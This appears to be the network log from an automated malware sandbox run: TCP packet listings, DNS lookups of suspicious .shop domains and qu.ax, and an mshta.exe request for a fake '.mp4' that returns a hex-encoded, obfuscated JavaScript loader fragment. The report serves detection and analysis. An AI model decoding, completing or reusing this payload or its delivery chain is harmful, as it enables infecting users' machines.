                                                                        Dec 17, 2024 08:38:48.259701967 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:48.270373106 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:48.270392895 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:48.270463943 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:48.270492077 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:48.270502090 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:48.270539045 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:48.270576954 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:48.270582914 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:48.270641088 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:48.273869038 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:48.273894072 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:48.273945093 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:48.273951054 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:48.274054050 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:48.278337002 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:48.278362036 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:48.278435946 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:48.278440952 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:48.278497934 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:48.282229900 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:48.282248974 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:48.282304049 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:48.282310963 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:48.286850929 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:48.286875963 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:48.286927938 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:48.286933899 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:48.286997080 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:48.449033976 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:48.449059963 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:48.449120998 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:48.449129105 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:48.449148893 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:48.449183941 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:48.453138113 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:48.453165054 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:48.453213930 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:48.453217983 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:48.453243971 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:48.453275919 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:48.457796097 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:48.457811117 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:48.457885027 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:48.457892895 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:48.457933903 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:48.461690903 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:48.461731911 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:48.461750984 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:48.461765051 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:48.461796999 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:48.461817026 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:48.466424942 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:48.466456890 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:48.466490030 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:48.466495037 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:48.466531992 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:48.470345974 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:48.470376968 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:48.470443010 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:48.470448017 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:48.470490932 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:48.474793911 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:48.474827051 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:48.474850893 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:48.474854946 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:48.474895000 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:48.478586912 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:48.478615999 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:48.478668928 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:48.478672981 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:48.478698969 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:48.478751898 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:48.641805887 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:48.641892910 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:48.641978025 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:48.641989946 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:48.642034054 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:48.645452023 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:48.645509958 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:48.645567894 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:48.645580053 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:48.645592928 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:48.645615101 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:48.650172949 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:48.650222063 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:48.650271893 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:48.650283098 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:48.650300980 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:48.650321007 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:48.654051065 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:48.654104948 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:48.654151917 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:48.654158115 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:48.654191017 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:48.658761978 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:48.658814907 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:48.658845901 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:48.658853054 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:48.658880949 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:48.658901930 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:48.662230968 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:48.662252903 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:48.662312984 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:48.662319899 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:48.662355900 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:48.667010069 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:48.667045116 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:48.667090893 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:48.667097092 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:48.667121887 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:48.667140007 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:48.670936108 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:48.670994997 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:48.671052933 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:48.671058893 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:48.671127081 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:48.833796024 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:48.833822966 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:48.833899975 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:48.833909988 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:48.833955050 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:48.838478088 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:48.838495970 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:48.838546038 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:48.838556051 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:48.838582039 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:48.838598013 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:48.842371941 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:48.842391014 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:48.842479944 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:48.842488050 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:48.842525005 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:48.846220970 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:48.846240044 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:48.846319914 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:48.846327066 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:48.846360922 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:48.848092079 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:48.848149061 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:48.851921082 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:48.851943016 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:48.852015018 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:48.852020979 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:48.852055073 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:48.856374025 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:48.856393099 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:48.856452942 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:48.856460094 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:48.856489897 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:48.861064911 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:48.861083984 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:48.861145020 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:48.861159086 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:48.861195087 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:48.864998102 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:48.865017891 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:48.865130901 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:48.865137100 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:48.865194082 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:49.027955055 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:49.027981043 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:49.028023958 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:49.028033018 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:49.028058052 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:49.028079987 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:49.031847000 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:49.031862974 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:49.031903028 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:49.031907082 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:49.031959057 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:49.036497116 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:49.036511898 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:49.036555052 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:49.036560059 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:49.036591053 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:49.040373087 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:49.040386915 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:49.040432930 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:49.040438890 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:49.040484905 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:49.044213057 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:49.044230938 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:49.044260979 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:49.044265985 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:49.044310093 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:49.048706055 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:49.048723936 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:49.048777103 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:49.048780918 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:49.048809052 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:49.053436041 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:49.053456068 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:49.053489923 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:49.053493977 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:49.053522110 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:49.057327032 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:49.057344913 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:49.057377100 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:49.057380915 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:49.057413101 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:49.057430983 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:49.220249891 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:49.220274925 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:49.220341921 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:49.220349073 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:49.220396996 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:49.224054098 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:49.224067926 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:49.224169016 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:49.224169016 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:49.224174023 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:49.224251032 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:49.228864908 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:49.228883028 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:49.228962898 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:49.228970051 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:49.229012966 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:49.229012966 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:49.231698036 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:49.231724024 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:49.231790066 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:49.231817961 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:49.232000113 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:49.232225895 CET49716443192.168.2.12188.114.96.6

                                                                        UDP Packets

                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Dec 17, 2024 08:38:19.009756088 CET6502553192.168.2.121.1.1.1
                                                                        Dec 17, 2024 08:38:19.148190022 CET53650251.1.1.1192.168.2.12
                                                                        Dec 17, 2024 08:38:23.670733929 CET5055853192.168.2.121.1.1.1
                                                                        Dec 17, 2024 08:38:23.810551882 CET53505581.1.1.1192.168.2.12
                                                                        Dec 17, 2024 08:38:25.945424080 CET5987053192.168.2.121.1.1.1
                                                                        Dec 17, 2024 08:38:26.209182978 CET53598701.1.1.1192.168.2.12
                                                                        Dec 17, 2024 08:38:39.824320078 CET5315653192.168.2.121.1.1.1
                                                                        Dec 17, 2024 08:39:03.736057043 CET6000453192.168.2.121.1.1.1
                                                                        Dec 17, 2024 08:39:27.797846079 CET5488453192.168.2.121.1.1.1
                                                                        Dec 17, 2024 08:39:51.860122919 CET6164953192.168.2.121.1.1.1
                                                                        Dec 17, 2024 08:40:16.099242926 CET5968753192.168.2.121.1.1.1

                                                                        DNS Queries

                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                        Dec 17, 2024 08:38:19.009756088 CET192.168.2.121.1.1.10x1329Standard query (0)static.klipxuhaq.shopA (IP address)IN (0x0001)false
                                                                        Dec 17, 2024 08:38:23.670733929 CET192.168.2.121.1.1.10x1686Standard query (0)qu.axA (IP address)IN (0x0001)false
                                                                        Dec 17, 2024 08:38:25.945424080 CET192.168.2.121.1.1.10xf959Standard query (0)denek.local-wanderer.shopA (IP address)IN (0x0001)false
                                                                        Dec 17, 2024 08:38:39.824320078 CET192.168.2.121.1.1.10xbf69Standard query (0)x1.i.lencr.orgA (IP address)IN (0x0001)false
                                                                        Dec 17, 2024 08:39:03.736057043 CET192.168.2.121.1.1.10xea5cStandard query (0)x1.i.lencr.orgA (IP address)IN (0x0001)false
                                                                        Dec 17, 2024 08:39:27.797846079 CET192.168.2.121.1.1.10xcffeStandard query (0)x1.i.lencr.orgA (IP address)IN (0x0001)false
                                                                        Dec 17, 2024 08:39:51.860122919 CET192.168.2.121.1.1.10x4b4dStandard query (0)x1.i.lencr.orgA (IP address)IN (0x0001)false
                                                                        Dec 17, 2024 08:40:16.099242926 CET192.168.2.121.1.1.10x43d8Standard query (0)x1.i.lencr.orgA (IP address)IN (0x0001)false

                                                                        DNS Answers

                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                        Dec 17, 2024 08:38:19.148190022 CET1.1.1.1192.168.2.120x1329No error (0)static.klipxuhaq.shop104.21.48.1A (IP address)IN (0x0001)false
                                                                        Dec 17, 2024 08:38:19.148190022 CET1.1.1.1192.168.2.120x1329No error (0)static.klipxuhaq.shop104.21.80.1A (IP address)IN (0x0001)false
                                                                        Dec 17, 2024 08:38:19.148190022 CET1.1.1.1192.168.2.120x1329No error (0)static.klipxuhaq.shop104.21.96.1A (IP address)IN (0x0001)false
                                                                        Dec 17, 2024 08:38:19.148190022 CET1.1.1.1192.168.2.120x1329No error (0)static.klipxuhaq.shop104.21.112.1A (IP address)IN (0x0001)false
                                                                        Dec 17, 2024 08:38:19.148190022 CET1.1.1.1192.168.2.120x1329No error (0)static.klipxuhaq.shop104.21.64.1A (IP address)IN (0x0001)false
                                                                        Dec 17, 2024 08:38:19.148190022 CET1.1.1.1192.168.2.120x1329No error (0)static.klipxuhaq.shop104.21.16.1A (IP address)IN (0x0001)false
                                                                        Dec 17, 2024 08:38:19.148190022 CET1.1.1.1192.168.2.120x1329No error (0)static.klipxuhaq.shop104.21.32.1A (IP address)IN (0x0001)false
                                                                        Dec 17, 2024 08:38:23.810551882 CET1.1.1.1192.168.2.120x1686No error (0)qu.ax188.245.211.225A (IP address)IN (0x0001)false
                                                                        Dec 17, 2024 08:38:26.209182978 CET1.1.1.1192.168.2.120xf959No error (0)denek.local-wanderer.shop188.114.96.6A (IP address)IN (0x0001)false
                                                                        Dec 17, 2024 08:38:26.209182978 CET1.1.1.1192.168.2.120xf959No error (0)denek.local-wanderer.shop188.114.97.6A (IP address)IN (0x0001)false
                                                                        Dec 17, 2024 08:38:40.057307959 CET1.1.1.1192.168.2.120xbf69No error (0)x1.i.lencr.orgcrl.root-x1.letsencrypt.org.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                        Dec 17, 2024 08:39:03.982022047 CET1.1.1.1192.168.2.120xea5cNo error (0)x1.i.lencr.orgcrl.root-x1.letsencrypt.org.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                        Dec 17, 2024 08:39:28.015808105 CET1.1.1.1192.168.2.120xcffeNo error (0)x1.i.lencr.orgcrl.root-x1.letsencrypt.org.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                        Dec 17, 2024 08:39:52.090167999 CET1.1.1.1192.168.2.120x4b4dNo error (0)x1.i.lencr.orgcrl.root-x1.letsencrypt.org.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                        Dec 17, 2024 08:40:16.416901112 CET1.1.1.1192.168.2.120x43d8No error (0)x1.i.lencr.orgcrl.root-x1.letsencrypt.org.edgekey.netCNAME (Canonical name)IN (0x0001)false

                                                                        HTTP Request Dependency Graph

                                                                        • static.klipxuhaq.shop
                                                                        • qu.ax
                                                                        • denek.local-wanderer.shop

                                                                        HTTPS Proxied Packets

                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        0192.168.2.1249711104.21.48.14435868C:\Windows\System32\mshta.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-17 07:38:20 UTC334OUTGET /BUX6P.mp4 HTTP/1.1
                                                                        Accept: */*
                                                                        Accept-Language: en-CH
                                                                        UA-CPU: AMD64
                                                                        Accept-Encoding: gzip, deflate
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                        Host: static.klipxuhaq.shop
                                                                        Connection: Keep-Alive
                                                                        2024-12-17 07:38:21 UTC911INHTTP/1.1 200 OK
                                                                        Date: Tue, 17 Dec 2024 07:38:21 GMT
                                                                        Content-Type: video/mp4
                                                                        Content-Length: 340566
                                                                        Connection: close
                                                                        Accept-Ranges: bytes
                                                                        ETag: "0482adc1dd52998e62ba661eba48b282"
                                                                        Last-Modified: Sun, 15 Dec 2024 09:49:50 GMT
                                                                        Vary: Accept-Encoding
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RXhOYGo6%2BaLuErBTvKUpTl66MiJvHwpxdIqwWTiprJr7WhVIMVVU0xURisnkNxmw2I9P2luOv9iUlpP4TPgJtyPOmV4DumwCuamE8YnqhpEKh%2BhLXW3WbBs9S81QMLSKzU3%2B%2BhSQlY0%3D"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f3540c72a1ac323-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1478&min_rtt=1471&rtt_var=567&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2872&recv_bytes=916&delivery_rate=1903520&cwnd=214&unsent_bytes=0&cid=1e3e7dadd2395a91&ts=959&x=0"
                                                                        2024-12-17 07:38:21 UTC1369INData Raw: 36 36 4e 37 35 54 36 65 76 36 33 6a 37 34 41 36 39 56 36 66 7a 36 65 56 32 30 77 36 37 4d 36 31 74 36 66 6f 35 39 55 36 33 70 32 38 74 36 36 77 36 65 75 34 34 77 37 37 70 34 35 4b 35 30 66 32 39 70 37 62 4b 37 36 66 36 31 53 37 32 44 32 30 57 34 39 57 36 37 42 36 33 50 34 64 52 34 39 53 33 64 78 32 30 79 32 37 4c 32 37 4a 33 62 4d 36 36 78 36 66 63 37 32 71 32 30 4a 32 38 6f 37 36 44 36 31 73 37 32 68 32 30 72 34 62 54 34 31 4f 34 36 44 36 31 49 32 30 55 33 64 50 32 30 59 33 30 54 33 62 4b 34 62 59 34 31 49 34 36 51 36 31 51 32 30 78 33 63 7a 32 30 64 36 36 54 36 65 68 34 34 75 37 37 62 34 35 71 35 30 57 32 65 65 36 63 6b 36 35 6b 36 65 78 36 37 55 37 34 7a 36 38 41 33 62 72 32 30 6c 34 62 53 34 31 78 34 36 62 36 31 6b 32 62 48 32 62 54 32 39 74 37 62 76
                                                                        Data Ascii: 66N75T6ev63j74A69V6fz6eV20w67M61t6fo59U63p28t66w6eu44w77p45K50f29p7bK76f61S72D20W49W67B63P4dR49S3dx20y27L27J3bM66x6fc72q20J28o76D61s72h20r4bT41O46D61I20U3dP20Y30T3bK4bY41I46Q61Q20x3cz20d66T6eh44u77b45q50W2ee6ck65k6ex67U74z68A3br20l4bS41x46b61k2bH2bT29t7bv
